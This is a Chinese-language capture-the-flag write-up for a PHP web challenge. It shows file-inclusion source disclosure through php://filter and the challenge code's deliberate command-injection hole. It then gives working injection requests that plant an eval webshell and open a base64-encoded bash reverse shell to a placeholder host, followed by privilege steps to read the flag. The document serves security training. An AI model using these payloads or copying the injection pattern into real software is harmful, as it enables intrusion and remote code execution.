第1步,开局:
http://url/?file=GWHT.php第2步:使用dirsearch-master扫描网站:得robots.txt
内容为:
Disallow: /?file=check.php看样子是文件包含:
第3步,编码访问得源码[ GWHT.php check.php index.php ] ,index.php无法继续包含:
http://url/?file=php://filter/convert.%25%36%32ase64-encode/resource=GWHT.php第4步 ,从GWHT.php得知需要exec执行,从check.php得知cookie密码PASS:
如下是check.php:
<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";
header('Location: /');
GWHT.php 的源码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>
<style>
html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
<center><img src="question.jpg" height="200" width="200" /> </center>
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
<h1>A Counter is here, but it has someting wrong</h1>
<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
</body>
</html>
第5步,写一句话木马,我使用BurpSuite v2022.1 ,发包请求关键2行如下:
GET /GWHT.php?count='56|echo+"%3C%3F%3D+eval(%5c%24_REQUEST%5B2%5D)%3F%3E"+%3Ed.php||' HTTP/1.1
Cookie: pass=GWHT这句话是为了使用exec执行:
printf ''56|echo "<?= eval($_REQUEST[2])?>" >d.php||' | wc -c
好像不怎么完美,继续探测:
GET /GWHT.php?count=456'"`ls+-al+/|tr+'\n'+F+`"%26%26id|'id HTTP/1.1
这个就是为了看根目录的文件
语句就是:
printf '456'"`ls -al /|tr '\n' F `"&&id|'id' |wc -c使用tr命令是为了应对exec只返回一行的问题.
第6步,使用bash反弹非交互式shell:
GET /GWHT.php?count=456'`bash+-c+"echo+KGJhc2ggJj4gL2...km|/usr/bin/bas[e]64+-d|bash"`%26%26id|'id HTTP/1.1语句就是如下格式 ,这次去除了不必要的双引号:
printf '456'`bash -c "echo KGJhc2gg...Ckm|/usr/bin/bas[e]64 -d|bash`&&id|'id' |wc -c攻击端需要在5步监听好端口
nc -l 7788解释一下,上面的base64:
echo KGJhc2gg...Ckm
(bash &> /dev/tcp/xxip/xxport 0>&1 )&反弹成功后,可以写一句话木马,虽然之前可以写(蚁剑管理也没问题)
echo '<?=eval($_REQUEST[2]);'>p.php如下可以测试一句话木马是否工作正常:
http://xxx.node4.buuoj.cn:81/p.php?2=print_r(123);如下寻找,可以写的目录:
find / -group 33 -user 33 -type d 2>/dev/null > 1d.txt &
/run/lock/apache2
/run/apache2
/var/cache/apache2/mod_cache_disk
/var/log/apache2
/var/www/html通过读取如下文件,得到GWHT用户的hash密码,解密后得密码:GWHTCTF.
cat /GWHT/README
My password hash is 877862561ba0162ce610dd8bf90868ad414f0ec6.
使用[su - GWHT]切换用户,
此时才可以(以GWHT的身份)读flag文件
cat /GWHT/system/of/a/down/flag.txt非预期解,我猜可以是session文件包含了:
[NPUCTF2020]ezinclude_bfengj的博客-CSDN博客 https://blog.csdn.net/rfrder/article/details/114656092
评论里有句话:
非预期解好强,5.4以上出现类似这种文件包含的情况都可以用吗
利用session.upload_progress进行文件包含和反序列化渗透 - FreeBuf网络安全行业门户 https://www.freebuf.com/vuls/202819.html
